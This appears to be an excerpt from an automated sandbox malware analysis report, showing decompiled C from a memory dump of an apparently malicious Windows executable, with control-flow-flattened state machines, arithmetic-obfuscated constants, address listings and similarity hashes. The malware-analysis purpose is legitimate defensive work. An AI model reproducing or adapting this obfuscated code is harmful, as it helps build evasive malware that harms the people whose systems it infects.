                                                                                                                                                                                                                    						_t261 = _t259 - 1 + _t283;
                                                                                                                                                                                                                    						while(_t261 > _t283) {
                                                                                                                                                                                                                    							if( *_t261 == 0) {
                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t261 = _t261 - 1;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t262 = _t261 - _t283;
                                                                                                                                                                                                                    						_v44 = _t262;
                                                                                                                                                                                                                    						if(_t262 == 0) {
                                                                                                                                                                                                                    							L20:
                                                                                                                                                                                                                    							_t279 = 0x9b6295e;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						while(_v44 % _v68 != _v56) {
                                                                                                                                                                                                                    							_t215 =  &_v44;
                                                                                                                                                                                                                    							 *_t215 = _v44 - 1;
                                                                                                                                                                                                                    							if( *_t215 != 0) {
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t279 == 0x9b6295e) {
                                                                                                                                                                                                                    						_t265 = E00A6E6CA(_v120, _v72,  &_v48,  &_v40, _v52);
                                                                                                                                                                                                                    						_t325 = _t325 + 0xc;
                                                                                                                                                                                                                    						if(_t265 == 0) {
                                                                                                                                                                                                                    							L8:
                                                                                                                                                                                                                    							return _t313;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t279 = 0xb138427;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t279 == 0xa232756) {
                                                                                                                                                                                                                    						_t279 = 0x9541785;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t279 == 0xb138427) {
                                                                                                                                                                                                                    						_t268 = E00A67361( &_v32, _v112,  &_v40, _v128, _v64);
                                                                                                                                                                                                                    						_t325 = _t325 + 0xc;
                                                                                                                                                                                                                    						asm("sbb ecx, ecx");
                                                                                                                                                                                                                    						_t279 = ( ~_t268 & 0xf9b92987) + 0xd30d3ae;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t279 != 0xd30d3ae) {
                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                    						if(_t279 != 0xa436f8b) {
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					E00A76A6B(_v40, _v92, _v100, _v108, _v116);
                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				_t258 = E00A6E3C6(_v80,  &_v32, _v104, _v96,  &_v12);
                                                                                                                                                                                                                    				_t325 = _t325 + 0xc;
                                                                                                                                                                                                                    				if(_t258 != 0) {
                                                                                                                                                                                                                    					_t274 = E00A7C6D9(_v8);
                                                                                                                                                                                                                    					 *_t315 = _t274;
                                                                                                                                                                                                                    					if(_t274 != 0) {
                                                                                                                                                                                                                    						E00A7056B(_v12, _v124,  *_t315, _v8, _v76, _v132, _v60);
                                                                                                                                                                                                                    						_t325 = _t325 + 0x14;
                                                                                                                                                                                                                    						 *((intOrPtr*)(_t315 + 4)) = _v8;
                                                                                                                                                                                                                    						_t313 = 1;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				_t279 = 0xd30d3ae;
                                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                                    			}




















































                                                                                                                                                                                                                    0x00a756ff
                                                                                                                                                                                                                    0x00a75708
                                                                                                                                                                                                                    0x00a75710
                                                                                                                                                                                                                    0x00a75711
                                                                                                                                                                                                                    0x00a75712
                                                                                                                                                                                                                    0x00a75719
                                                                                                                                                                                                                    0x00a7571a
                                                                                                                                                                                                                    0x00a7571b
                                                                                                                                                                                                                    0x00a75720
                                                                                                                                                                                                                    0x00a75728
                                                                                                                                                                                                                    0x00a7572b
                                                                                                                                                                                                                    0x00a75732
                                                                                                                                                                                                                    0x00a7573a
                                                                                                                                                                                                                    0x00a7573c
                                                                                                                                                                                                                    0x00a75744
                                                                                                                                                                                                                    0x00a75750
                                                                                                                                                                                                                    0x00a75753
                                                                                                                                                                                                                    0x00a75757
                                                                                                                                                                                                                    0x00a7575f
                                                                                                                                                                                                                    0x00a75767
                                                                                                                                                                                                                    0x00a7576f
                                                                                                                                                                                                                    0x00a75777
                                                                                                                                                                                                                    0x00a75784
                                                                                                                                                                                                                    0x00a75788
                                                                                                                                                                                                                    0x00a75790
                                                                                                                                                                                                                    0x00a75798
                                                                                                                                                                                                                    0x00a757a0
                                                                                                                                                                                                                    0x00a757a8
                                                                                                                                                                                                                    0x00a757b0
                                                                                                                                                                                                                    0x00a757c0
                                                                                                                                                                                                                    0x00a757c4
                                                                                                                                                                                                                    0x00a757cc
                                                                                                                                                                                                                    0x00a757d4
                                                                                                                                                                                                                    0x00a757d9
                                                                                                                                                                                                                    0x00a757de
                                                                                                                                                                                                                    0x00a757e6
                                                                                                                                                                                                                    0x00a757ee
                                                                                                                                                                                                                    0x00a757fb
                                                                                                                                                                                                                    0x00a757fe
                                                                                                                                                                                                                    0x00a75807
                                                                                                                                                                                                                    0x00a7580b
                                                                                                                                                                                                                    0x00a75813
                                                                                                                                                                                                                    0x00a7581b
                                                                                                                                                                                                                    0x00a75823
                                                                                                                                                                                                                    0x00a7582b
                                                                                                                                                                                                                    0x00a75833
                                                                                                                                                                                                                    0x00a7583b
                                                                                                                                                                                                                    0x00a75840
                                                                                                                                                                                                                    0x00a75848
                                                                                                                                                                                                                    0x00a75850
                                                                                                                                                                                                                    0x00a75858
                                                                                                                                                                                                                    0x00a75868
                                                                                                                                                                                                                    0x00a7586c
                                                                                                                                                                                                                    0x00a75874
                                                                                                                                                                                                                    0x00a7587c
                                                                                                                                                                                                                    0x00a75888
                                                                                                                                                                                                                    0x00a7588b
                                                                                                                                                                                                                    0x00a7588f
                                                                                                                                                                                                                    0x00a75897
                                                                                                                                                                                                                    0x00a7589f
                                                                                                                                                                                                                    0x00a758a7
                                                                                                                                                                                                                    0x00a758af
                                                                                                                                                                                                                    0x00a758b6
                                                                                                                                                                                                                    0x00a758be
                                                                                                                                                                                                                    0x00a758c6
                                                                                                                                                                                                                    0x00a758ce
                                                                                                                                                                                                                    0x00a758d6
                                                                                                                                                                                                                    0x00a758de
                                                                                                                                                                                                                    0x00a758e6
                                                                                                                                                                                                                    0x00a758f5
                                                                                                                                                                                                                    0x00a758f8
                                                                                                                                                                                                                    0x00a758fc
                                                                                                                                                                                                                    0x00a75904
                                                                                                                                                                                                                    0x00a7590c
                                                                                                                                                                                                                    0x00a75914
                                                                                                                                                                                                                    0x00a75924
                                                                                                                                                                                                                    0x00a75928
                                                                                                                                                                                                                    0x00a75930
                                                                                                                                                                                                                    0x00a75938
                                                                                                                                                                                                                    0x00a75940
                                                                                                                                                                                                                    0x00a75945
                                                                                                                                                                                                                    0x00a7594a
                                                                                                                                                                                                                    0x00a75952
                                                                                                                                                                                                                    0x00a7595a
                                                                                                                                                                                                                    0x00a75962
                                                                                                                                                                                                                    0x00a7596a
                                                                                                                                                                                                                    0x00a75977
                                                                                                                                                                                                                    0x00a7597a
                                                                                                                                                                                                                    0x00a7597e
                                                                                                                                                                                                                    0x00a75983
                                                                                                                                                                                                                    0x00a7598b
                                                                                                                                                                                                                    0x00a7599b
                                                                                                                                                                                                                    0x00a7599f
                                                                                                                                                                                                                    0x00a759a7
                                                                                                                                                                                                                    0x00a759af
                                                                                                                                                                                                                    0x00a759b7
                                                                                                                                                                                                                    0x00a759bf
                                                                                                                                                                                                                    0x00a759cc
                                                                                                                                                                                                                    0x00a759cf
                                                                                                                                                                                                                    0x00a759d3
                                                                                                                                                                                                                    0x00a759db
                                                                                                                                                                                                                    0x00a759e3
                                                                                                                                                                                                                    0x00a759f0
                                                                                                                                                                                                                    0x00a759fc
                                                                                                                                                                                                                    0x00a75a04
                                                                                                                                                                                                                    0x00a75a0c
                                                                                                                                                                                                                    0x00a75a10
                                                                                                                                                                                                                    0x00a75a18
                                                                                                                                                                                                                    0x00a75a2a
                                                                                                                                                                                                                    0x00a75ae2
                                                                                                                                                                                                                    0x00a75ae5
                                                                                                                                                                                                                    0x00a75ae7
                                                                                                                                                                                                                    0x00a75aec
                                                                                                                                                                                                                    0x00a75af0
                                                                                                                                                                                                                    0x00a75afa
                                                                                                                                                                                                                    0x00a75af7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75af9
                                                                                                                                                                                                                    0x00a75af9
                                                                                                                                                                                                                    0x00a75afe
                                                                                                                                                                                                                    0x00a75b00
                                                                                                                                                                                                                    0x00a75b04
                                                                                                                                                                                                                    0x00a75b1e
                                                                                                                                                                                                                    0x00a75b1e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75b1e
                                                                                                                                                                                                                    0x00a75b06
                                                                                                                                                                                                                    0x00a75b18
                                                                                                                                                                                                                    0x00a75b18
                                                                                                                                                                                                                    0x00a75b1c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75b1c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75b06
                                                                                                                                                                                                                    0x00a75a36
                                                                                                                                                                                                                    0x00a75acc
                                                                                                                                                                                                                    0x00a75ad1
                                                                                                                                                                                                                    0x00a75ad6
                                                                                                                                                                                                                    0x00a75a6c
                                                                                                                                                                                                                    0x00a75a78
                                                                                                                                                                                                                    0x00a75a78
                                                                                                                                                                                                                    0x00a75ad8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75ad8
                                                                                                                                                                                                                    0x00a75a3e
                                                                                                                                                                                                                    0x00a75aac
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75aac
                                                                                                                                                                                                                    0x00a75a46
                                                                                                                                                                                                                    0x00a75a91
                                                                                                                                                                                                                    0x00a75a96
                                                                                                                                                                                                                    0x00a75a9d
                                                                                                                                                                                                                    0x00a75aa5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75aa5
                                                                                                                                                                                                                    0x00a75a4a
                                                                                                                                                                                                                    0x00a75ba1
                                                                                                                                                                                                                    0x00a75ba7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75bad
                                                                                                                                                                                                                    0x00a75a64
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75a69
                                                                                                                                                                                                                    0x00a75b43
                                                                                                                                                                                                                    0x00a75b48
                                                                                                                                                                                                                    0x00a75b4d
                                                                                                                                                                                                                    0x00a75b5e
                                                                                                                                                                                                                    0x00a75b63
                                                                                                                                                                                                                    0x00a75b68
                                                                                                                                                                                                                    0x00a75b8a
                                                                                                                                                                                                                    0x00a75b98
                                                                                                                                                                                                                    0x00a75b9b
                                                                                                                                                                                                                    0x00a75b9e
                                                                                                                                                                                                                    0x00a75b9e
                                                                                                                                                                                                                    0x00a75b68
                                                                                                                                                                                                                    0x00a75b9f
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: /_$H7V$V'#$V'#$^^($c9\
                                                                                                                                                                                                                    • API String ID: 0-2622741183
                                                                                                                                                                                                                    • Opcode ID: 924df5117db2575e870087874490ea2843bb1f7e1fd0cb5dc3c9f76665627c56
                                                                                                                                                                                                                    • Instruction ID: 33e761755fec797d5feaa74cd76b2880bd5f82ac3777b11bfe216afd9fb6780d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 924df5117db2575e870087874490ea2843bb1f7e1fd0cb5dc3c9f76665627c56
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59C131719087819FC768CF65C989A2BFBF1BBC4754F408A2DF18A86260D7B5C949CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                    			E00A6E6CA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				void* _t240;
                                                                                                                                                                                                                    				void* _t260;
                                                                                                                                                                                                                    				intOrPtr _t267;
                                                                                                                                                                                                                    				void* _t270;
                                                                                                                                                                                                                    				intOrPtr* _t271;
                                                                                                                                                                                                                    				void* _t273;
                                                                                                                                                                                                                    				intOrPtr _t290;
                                                                                                                                                                                                                    				signed int _t293;
                                                                                                                                                                                                                    				signed int _t294;
                                                                                                                                                                                                                    				signed int _t295;
                                                                                                                                                                                                                    				signed int _t296;
                                                                                                                                                                                                                    				void* _t298;
                                                                                                                                                                                                                    				void* _t299;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t271 = _a8;
                                                                                                                                                                                                                    				_t292 = _a4;
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_t271);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t240);
                                                                                                                                                                                                                    				_v8 = 0x340fc6;
                                                                                                                                                                                                                    				_t290 = 0;
                                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                                    				_t299 = _t298 + 0x14;
                                                                                                                                                                                                                    				_v40 = 0x78313;
                                                                                                                                                                                                                    				_v40 = _v40 << 0xd;
                                                                                                                                                                                                                    				_t273 = 0x9aba58b;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xf0626001;
                                                                                                                                                                                                                    				_v68 = 0x7fc6e;
                                                                                                                                                                                                                    				_v68 = _v68 + 0x7367;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xffff7597;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x0007e56d;
                                                                                                                                                                                                                    				_v36 = 0x4840f6;
                                                                                                                                                                                                                    				_t293 = 0x34;
                                                                                                                                                                                                                    				_v36 = _v36 * 0x58;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x18d65490;
                                                                                                                                                                                                                    				_v104 = 0x11b6c3;
                                                                                                                                                                                                                    				_v104 = _v104 >> 0xd;
                                                                                                                                                                                                                    				_v104 = _v104 + 0x899;
                                                                                                                                                                                                                    				_v104 = _v104 + 0x1dd8;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x000026fe;
                                                                                                                                                                                                                    				_v72 = 0x1d33cd;
                                                                                                                                                                                                                    				_v72 = _v72 * 0x78;
                                                                                                                                                                                                                    				_v72 = _v72 + 0x3bbe;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x0db083d6;
                                                                                                                                                                                                                    				_v24 = 0xc891fb;
                                                                                                                                                                                                                    				_v24 = _v24 | 0xfc91c64e;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0xfcd9d7ff;
                                                                                                                                                                                                                    				_v56 = 0xecf8ad;
                                                                                                                                                                                                                    				_v56 = _v56 >> 0xe;
                                                                                                                                                                                                                    				_v56 = _v56 | 0x9ebce37f;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x9ebce3ff;
                                                                                                                                                                                                                    				_v76 = 0x595284;
                                                                                                                                                                                                                    				_v76 = _v76 << 6;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x05fd89ed;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x13af46af;
                                                                                                                                                                                                                    				_v80 = 0x17c0fe;
                                                                                                                                                                                                                    				_v80 = _v80 / _t293;
                                                                                                                                                                                                                    				_v80 = _v80 >> 2;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x000c0e47;
                                                                                                                                                                                                                    				_v108 = 0x516ce0;
                                                                                                                                                                                                                    				_v108 = _v108 + 0xe67e;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x1ff3ace9;
                                                                                                                                                                                                                    				_v108 = _v108 + 0xffff52c6;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x1fa0ede3;
                                                                                                                                                                                                                    				_v112 = 0xc56176;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0xcd8b224d;
                                                                                                                                                                                                                    				_v112 = _v112 >> 0x10;
                                                                                                                                                                                                                    				_v112 = _v112 * 0x13;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0x000baaf0;
                                                                                                                                                                                                                    				_v116 = 0xddf46a;
                                                                                                                                                                                                                    				_v116 = _v116 * 0x1a;
                                                                                                                                                                                                                    				_v116 = _v116 | 0xdbc49743;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x76612177;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0xa9a4744e;
                                                                                                                                                                                                                    				_v44 = 0xbe4fff;
                                                                                                                                                                                                                    				_v44 = _v44 * 0x44;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x328b0fe3;
                                                                                                                                                                                                                    				_v96 = 0xd3ebd3;
                                                                                                                                                                                                                    				_v96 = _v96 >> 0xf;
                                                                                                                                                                                                                    				_v96 = _v96 + 0xffff9021;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x2aa84a4f;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0xd55f3290;
                                                                                                                                                                                                                    				_v100 = 0x2f57f9;
                                                                                                                                                                                                                    				_v100 = _v100 >> 7;
                                                                                                                                                                                                                    				_t294 = 0x67;
                                                                                                                                                                                                                    				_v100 = _v100 * 0x25;
                                                                                                                                                                                                                    				_v100 = _v100 + 0x5b17;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x0000da91;
                                                                                                                                                                                                                    				_v88 = 0xa4ba7b;
                                                                                                                                                                                                                    				_v88 = _v88 / _t294;
                                                                                                                                                                                                                    				_t295 = 0x31;
                                                                                                                                                                                                                    				_v88 = _v88 * 0xd;
                                                                                                                                                                                                                    				_v88 = _v88 * 0xc;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x00f13ece;
                                                                                                                                                                                                                    				_v28 = 0x4d7daf;
                                                                                                                                                                                                                    				_v28 = _v28 | 0xa8c34b80;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xa8cd7bd8;
                                                                                                                                                                                                                    				_v32 = 0xf37d43;
                                                                                                                                                                                                                    				_v32 = _v32 / _t295;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0005470c;
                                                                                                                                                                                                                    				_v60 = 0x5aca6b;
                                                                                                                                                                                                                    				_v60 = _v60 >> 2;
                                                                                                                                                                                                                    				_v60 = _v60 >> 0x10;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x000ae423;
                                                                                                                                                                                                                    				_v64 = 0x34fee1;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xd84b;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xffff8a9d;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x003f36aa;
                                                                                                                                                                                                                    				_v92 = 0xe89645;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x1705342f;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x4a7927e1;
                                                                                                                                                                                                                    				_v92 = _v92 >> 0xd;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x000bfa12;
                                                                                                                                                                                                                    				_v84 = 0x5e8c3e;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0xd48c2550;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0xce6aab20;
                                                                                                                                                                                                                    				_v84 = _v84 << 6;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0xae0850c5;
                                                                                                                                                                                                                    				_v48 = 0xf693bd;
                                                                                                                                                                                                                    				_v48 = _v48 | 0x38357684;
                                                                                                                                                                                                                    				_v48 = _v48 >> 0x10;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x000239d0;
                                                                                                                                                                                                                    				_v20 = 0xe9ad;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffffaae8;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x000dfbd6;
                                                                                                                                                                                                                    				_v52 = 0x837317;
                                                                                                                                                                                                                    				_t296 = 9;
                                                                                                                                                                                                                    				_v52 = _v52 / _t296;
                                                                                                                                                                                                                    				_v52 = _v52 + 0xffff2a56;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x000f5ae1;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t273 != 0xafa0c9) {
                                                                                                                                                                                                                    						if(_t273 == 0x7c9aeb9) {
                                                                                                                                                                                                                    							E00A76A6B(_v16, _v84, _v48, _v20, _v52);
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t273 == 0x9aba58b) {
                                                                                                                                                                                                                    								_t273 = 0xff79d30;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t273 == 0xbab91c3) {
                                                                                                                                                                                                                    									_t267 = E00A7C6D9(_v12);
                                                                                                                                                                                                                    									_v16 = _t267;
                                                                                                                                                                                                                    									if(_t267 != 0) {
                                                                                                                                                                                                                    										_t273 = 0xafa0c9;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t273 != 0xff79d30) {
                                                                                                                                                                                                                    										goto L13;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_t270 = E00A64618(_v36, _v76, _v104, _t273, _t290,  *_t292, _v80,  &_v12,  *((intOrPtr*)(_t292 + 4)), _t273, _v108, _v112,  *((intOrPtr*)( *0xa83208 + 0x50)), _v116, _v40, _v44);
                                                                                                                                                                                                                    										_t299 = _t299 + 0x38;
                                                                                                                                                                                                                    										if(_t270 == _v72) {
                                                                                                                                                                                                                    											_t273 = 0xbab91c3;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                    						return _t290;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t260 = E00A64618(_v12, _v88, _v24, _t273, _v16,  *_t292, _v28,  &_v12,  *((intOrPtr*)(_t292 + 4)), _t273, _v32, _v60,  *((intOrPtr*)( *0xa83208 + 0x50)), _v64, _v68, _v92);
                                                                                                                                                                                                                    					_t299 = _t299 + 0x38;
                                                                                                                                                                                                                    					if(_t260 == _v56) {
                                                                                                                                                                                                                    						 *_t271 = _v16;
                                                                                                                                                                                                                    						_t290 = 1;
                                                                                                                                                                                                                    						 *((intOrPtr*)(_t271 + 4)) = _v12;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						_t273 = 0x7c9aeb9;
                                                                                                                                                                                                                    						goto L13;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                    				} while (_t273 != 0x8dc993e);
                                                                                                                                                                                                                    				goto L17;
                                                                                                                                                                                                                    			}













































                                                                                                                                                                                                                    0x00a6e6ce
                                                                                                                                                                                                                    0x00a6e6d7
                                                                                                                                                                                                                    0x00a6e6df
                                                                                                                                                                                                                    0x00a6e6e6
                                                                                                                                                                                                                    0x00a6e6e7
                                                                                                                                                                                                                    0x00a6e6e8
                                                                                                                                                                                                                    0x00a6e6e9
                                                                                                                                                                                                                    0x00a6e6ea
                                                                                                                                                                                                                    0x00a6e6ef
                                                                                                                                                                                                                    0x00a6e6fa
                                                                                                                                                                                                                    0x00a6e6fc
                                                                                                                                                                                                                    0x00a6e703
                                                                                                                                                                                                                    0x00a6e706
                                                                                                                                                                                                                    0x00a6e710
                                                                                                                                                                                                                    0x00a6e715
                                                                                                                                                                                                                    0x00a6e71a
                                                                                                                                                                                                                    0x00a6e722
                                                                                                                                                                                                                    0x00a6e72a
                                                                                                                                                                                                                    0x00a6e732
                                                                                                                                                                                                                    0x00a6e73a
                                                                                                                                                                                                                    0x00a6e742
                                                                                                                                                                                                                    0x00a6e751
                                                                                                                                                                                                                    0x00a6e752
                                                                                                                                                                                                                    0x00a6e756
                                                                                                                                                                                                                    0x00a6e75e
                                                                                                                                                                                                                    0x00a6e766
                                                                                                                                                                                                                    0x00a6e76b
                                                                                                                                                                                                                    0x00a6e773
                                                                                                                                                                                                                    0x00a6e77b
                                                                                                                                                                                                                    0x00a6e783
                                                                                                                                                                                                                    0x00a6e790
                                                                                                                                                                                                                    0x00a6e794
                                                                                                                                                                                                                    0x00a6e79c
                                                                                                                                                                                                                    0x00a6e7a4
                                                                                                                                                                                                                    0x00a6e7ac
                                                                                                                                                                                                                    0x00a6e7b4
                                                                                                                                                                                                                    0x00a6e7bc
                                                                                                                                                                                                                    0x00a6e7c4
                                                                                                                                                                                                                    0x00a6e7c9
                                                                                                                                                                                                                    0x00a6e7d1
                                                                                                                                                                                                                    0x00a6e7d9
                                                                                                                                                                                                                    0x00a6e7e1
                                                                                                                                                                                                                    0x00a6e7e6
                                                                                                                                                                                                                    0x00a6e7ee
                                                                                                                                                                                                                    0x00a6e7f6
                                                                                                                                                                                                                    0x00a6e804
                                                                                                                                                                                                                    0x00a6e808
                                                                                                                                                                                                                    0x00a6e80d
                                                                                                                                                                                                                    0x00a6e815
                                                                                                                                                                                                                    0x00a6e81d
                                                                                                                                                                                                                    0x00a6e825
                                                                                                                                                                                                                    0x00a6e82d
                                                                                                                                                                                                                    0x00a6e835
                                                                                                                                                                                                                    0x00a6e83d
                                                                                                                                                                                                                    0x00a6e845
                                                                                                                                                                                                                    0x00a6e84d
                                                                                                                                                                                                                    0x00a6e857
                                                                                                                                                                                                                    0x00a6e85b
                                                                                                                                                                                                                    0x00a6e863
                                                                                                                                                                                                                    0x00a6e870
                                                                                                                                                                                                                    0x00a6e874
                                                                                                                                                                                                                    0x00a6e87c
                                                                                                                                                                                                                    0x00a6e884
                                                                                                                                                                                                                    0x00a6e88c
                                                                                                                                                                                                                    0x00a6e899
                                                                                                                                                                                                                    0x00a6e89d
                                                                                                                                                                                                                    0x00a6e8a5
                                                                                                                                                                                                                    0x00a6e8ad
                                                                                                                                                                                                                    0x00a6e8b2
                                                                                                                                                                                                                    0x00a6e8bc
                                                                                                                                                                                                                    0x00a6e8c4
                                                                                                                                                                                                                    0x00a6e8cc
                                                                                                                                                                                                                    0x00a6e8d4
                                                                                                                                                                                                                    0x00a6e8e0
                                                                                                                                                                                                                    0x00a6e8e3
                                                                                                                                                                                                                    0x00a6e8e7
                                                                                                                                                                                                                    0x00a6e8ef
                                                                                                                                                                                                                    0x00a6e8f7
                                                                                                                                                                                                                    0x00a6e907
                                                                                                                                                                                                                    0x00a6e910
                                                                                                                                                                                                                    0x00a6e913
                                                                                                                                                                                                                    0x00a6e91c
                                                                                                                                                                                                                    0x00a6e920
                                                                                                                                                                                                                    0x00a6e928
                                                                                                                                                                                                                    0x00a6e930
                                                                                                                                                                                                                    0x00a6e938
                                                                                                                                                                                                                    0x00a6e940
                                                                                                                                                                                                                    0x00a6e950
                                                                                                                                                                                                                    0x00a6e954
                                                                                                                                                                                                                    0x00a6e95c
                                                                                                                                                                                                                    0x00a6e964
                                                                                                                                                                                                                    0x00a6e969
                                                                                                                                                                                                                    0x00a6e96e
                                                                                                                                                                                                                    0x00a6e976
                                                                                                                                                                                                                    0x00a6e97e
                                                                                                                                                                                                                    0x00a6e986
                                                                                                                                                                                                                    0x00a6e98e
                                                                                                                                                                                                                    0x00a6e996
                                                                                                                                                                                                                    0x00a6e99e
                                                                                                                                                                                                                    0x00a6e9a6
                                                                                                                                                                                                                    0x00a6e9ae
